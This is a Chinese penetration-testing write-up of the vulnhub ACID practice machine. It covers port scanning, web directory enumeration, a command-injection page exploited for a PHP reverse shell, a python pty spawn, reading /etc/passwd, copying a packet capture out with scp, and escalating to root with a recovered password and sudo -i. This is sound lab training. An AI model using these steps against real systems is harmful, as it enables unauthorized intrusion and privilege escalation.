渗透测试之ACID

本次实验使用的靶机:vulnhub-acid

测试过程详解:

  1. 首先使用nmap探测存活端口:nmap 10.1.1.1/24,扫描整个虚拟机存在的网段,探测存活的主机。在同一局域网内,还可以使用其他的探测方法。得到主机IP地址:10.1.1.142
    渗透测试之ACID_第1张图片
  2. 探测到存活主机下意识使用80端口访问,结果这么鸡贼的web服务居然没有在80端口,得了,再来一遍端口扫描:nmap -sS -sV -v -p- 10.1.1.142,发现只开放了33447端口,web服务就在这个端口上。
    渗透测试之ACID_第2张图片
    访问一波:
    渗透测试之ACID_第3张图片
    然后还在源码里面找到一些小提示,然而后续的测试并没有用到,是个假提示。。。。
    在这里插入图片描述
    经过16进制->ascii->一张图片地址->图片藏有16进制字符串->ascii码字符->md5解密:
    渗透测试之ACID_第4张图片
  3. 找到web服务的第一步就是进行web目录扫描,查看有哪些web文件,此时你需要一个异常强大的字典。开始扫描用了两三个扫描器都没扫到有用的WEB目录。
    渗透测试之ACID_第5张图片
    发现了一些有用的web文件,访问一波:
    index.php:登录,没有账号密码,先放弃
    hacked.php:开始还以为有后门,结果不是,让我输入一个id,把之前拿到的那玩意输进去,没啥用,暂时放弃,而且之后查看了一下这个文件,明明是个注入点,但是就是测不出来,有鬼。
    include.php:一个文件包含的页面,但是没有上传点,拿不到shell,想看看其他文件也失败了,放弃。
    cake.php:这个文件截图没有,但是存在,访问了一波,也没啥用,但是标题指向了一个新的目录,继续扫描一波。
    渗透测试之ACID_第6张图片
    发现如下目录:
    low.php:经过查看源码,这个也是一个命令执行的文件,但是由于不知道输入什么参数,所以没啥用。
    command.php:一个存在命令执行漏洞的文件,尝试一波命令执行反弹shell。
    渗透测试之ACID_第7张图片
    既然可以命令执行,尝试一波反弹shell:
    首先在kali上面nc监听一个端口:
    渗透测试之ACID_第8张图片
    之后尝试各种反弹shell的方式,只有php反弹shell成功:
    渗透测试之ACID_第9张图片
    渗透测试之ACID_第10张图片
    渗透测试之ACID_第11张图片
  4. 获取低权限shell,进行权限提升,作为一枚菜鸡,不太会利用内核漏洞啥的提权,没收集这么多exp【菜.jpg】,那就只能尝试使用su命令来提权了,结果遇到一个坑,不是终端环境,su命令无法执行,于是学到了利用python调用本地shell,生成终端环境:
    渗透测试之ACID_第12张图片
    生成python文件,调用本地终端:
    1、echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
    2、python /tmp/asdf.py
    渗透测试之ACID_第13张图片
  5. 接下来就是提权了:
    首先看看/etc/passwd文件,看看有哪些用户:
    渗透测试之ACID_第14张图片
    重点关注acid、saman、www-data这个几个用户,然后对每个用户进行了一次用户目录查找,看一下有什么特殊文件:
    渗透测试之ACID_第15张图片
    在acid用户下发现一个pacp流量包,下载下来,使用wireshark分析一下:
    渗透测试之ACID_第16张图片
  6. 在本地打开ssh服务,然后通过命令:scp /sbin/raw_vs_isi/hint.pcapng [email protected]:/root/将文件下载到本地,然后分析一波。
    渗透测试之ACID_第17张图片
    之后看到巨多的SNMP协议包,还以为会有什么敏感信息藏在里面,分析了一波UDP数据流,结果啥都没有:
    渗透测试之ACID_第18张图片
    之后乖乖分析TCP协议流,然后密码就藏在第一个流当中,采坑真可怕:
    渗透测试之ACID_第19张图片
  7. 拿到密码之后提升到saman用户,然后利用sudo -i的命令可以提升到root用户
    渗透测试之ACID_第20张图片
    sudo -i: 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。执行该命令后提示符变为“#”而不是“$”。想退回普通账户时可以执行“exit”或“logout” 。
    权限到手天下我有,之后就打算分析一波整个web服务的结构,看能不能挖到新的漏洞,有没有其他的漏洞可以利用一波。

你可能感兴趣的:(渗透测试)